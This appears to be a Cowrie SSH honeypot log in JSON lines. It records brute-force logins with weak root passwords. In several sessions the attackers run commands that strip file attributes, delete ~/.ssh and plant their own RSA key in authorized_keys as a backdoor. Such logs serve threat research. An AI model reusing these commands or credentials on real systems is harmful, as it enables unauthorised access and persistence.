{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":53302,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd0353766765","protocol":"ssh","message":"New connection: 103.217.145.104:53302 (1.2.3.4:22) [session: bd0353766765]","sensor":"my-vps","timestamp":"2025-08-26T04:00:41.789294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:00:41.789943Z","src_ip":"103.217.145.104","session":"bd0353766765"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:00:42.055599Z","src_ip":"103.217.145.104","session":"bd0353766765"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:42.122744Z","src_ip":"212.227.235.229","session":"689225265dba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43700,"dst_ip":"1.2.3.4","dst_port":22,"session":"06074123f4ca","protocol":"ssh","message":"New connection: 212.227.235.229:43700 (1.2.3.4:22) [session: 06074123f4ca]","sensor":"my-vps","timestamp":"2025-08-26T04:00:42.396302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:00:42.397776Z","src_ip":"212.227.235.229","session":"06074123f4ca"}
{"eventid":"cowrie.login.failed","username":"louis","password":"louis","message":"login attempt [louis/louis] failed","sensor":"my-vps","timestamp":"2025-08-26T04:00:43.160272Z","src_ip":"103.217.145.104","session":"bd0353766765"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:00:43.677117Z","src_ip":"212.227.235.229","session":"06074123f4ca"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:00:44.484169Z","src_ip":"212.227.235.229","session":"06074123f4ca"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:44.498057Z","src_ip":"103.217.145.104","session":"bd0353766765"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:44.757263Z","src_ip":"212.227.235.229","session":"06074123f4ca"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:45.261439Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":55632,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a93c19bdcdf","protocol":"ssh","message":"New connection: 68.183.87.241:55632 (1.2.3.4:22) [session: 8a93c19bdcdf]","sensor":"my-vps","timestamp":"2025-08-26T04:01:05.383648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:01:05.384798Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:01:05.644424Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.login.success","username":"root","password":"younes123","message":"login attempt [root/younes123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:01:06.727607Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:01:07.333839Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:01:07.334625Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:01:07.336026Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:01:07.597059Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:01:08.134007Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:01:08.134931Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:01:08.397179Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:01:08.398177Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":55638,"dst_ip":"1.2.3.4","dst_port":22,"session":"60bce39c4635","protocol":"ssh","message":"New connection: 68.183.87.241:55638 (1.2.3.4:22) [session: 60bce39c4635]","sensor":"my-vps","timestamp":"2025-08-26T04:01:08.662772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:01:08.663697Z","src_ip":"68.183.87.241","session":"60bce39c4635"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:01:08.926696Z","src_ip":"68.183.87.241","session":"60bce39c4635"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:01:10.020145Z","src_ip":"68.183.87.241","session":"60bce39c4635"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:01:11.286112Z","src_ip":"68.183.87.241","session":"60bce39c4635"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":55640,"dst_ip":"1.2.3.4","dst_port":22,"session":"4721c44e1652","protocol":"ssh","message":"New connection: 68.183.87.241:55640 (1.2.3.4:22) [session: 4721c44e1652]","sensor":"my-vps","timestamp":"2025-08-26T04:01:11.543161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:01:11.544076Z","src_ip":"68.183.87.241","session":"4721c44e1652"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:01:11.818492Z","src_ip":"68.183.87.241","session":"4721c44e1652"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:01:12.933878Z","src_ip":"68.183.87.241","session":"4721c44e1652"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:01:13.199649Z","src_ip":"68.183.87.241","session":"4721c44e1652"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:01:13.202610Z","src_ip":"68.183.87.241","session":"8a93c19bdcdf"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:01:56.423464Z","src_ip":"212.227.235.229","session":"2f9a4e74e8ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ac33e9cb837","protocol":"ssh","message":"New connection: 212.227.235.229:41704 (1.2.3.4:22) [session: 2ac33e9cb837]","sensor":"my-vps","timestamp":"2025-08-26T04:01:59.040779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:01:59.041738Z","src_ip":"212.227.235.229","session":"2ac33e9cb837"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:02:05.044798Z","src_ip":"212.227.235.229","session":"2ac33e9cb837"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:05.046723Z","src_ip":"212.227.235.229","session":"2ac33e9cb837"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":35066,"dst_ip":"1.2.3.4","dst_port":22,"session":"76865eb6cabe","protocol":"ssh","message":"New connection: 103.217.145.104:35066 (1.2.3.4:22) [session: 76865eb6cabe]","sensor":"my-vps","timestamp":"2025-08-26T04:02:07.672395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:02:07.699399Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:02:07.966888Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.login.success","username":"root","password":"jack","message":"login attempt [root/jack] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:02:09.037892Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:02:09.624612Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:02:09.625335Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:02:09.626541Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:10.135539Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:02:10.691008Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:02:10.691779Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:02:10.962842Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:10.963818Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":36528,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8158e33519a","protocol":"ssh","message":"New connection: 103.217.145.104:36528 (1.2.3.4:22) [session: d8158e33519a]","sensor":"my-vps","timestamp":"2025-08-26T04:02:11.238187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:02:11.239155Z","src_ip":"103.217.145.104","session":"d8158e33519a"}
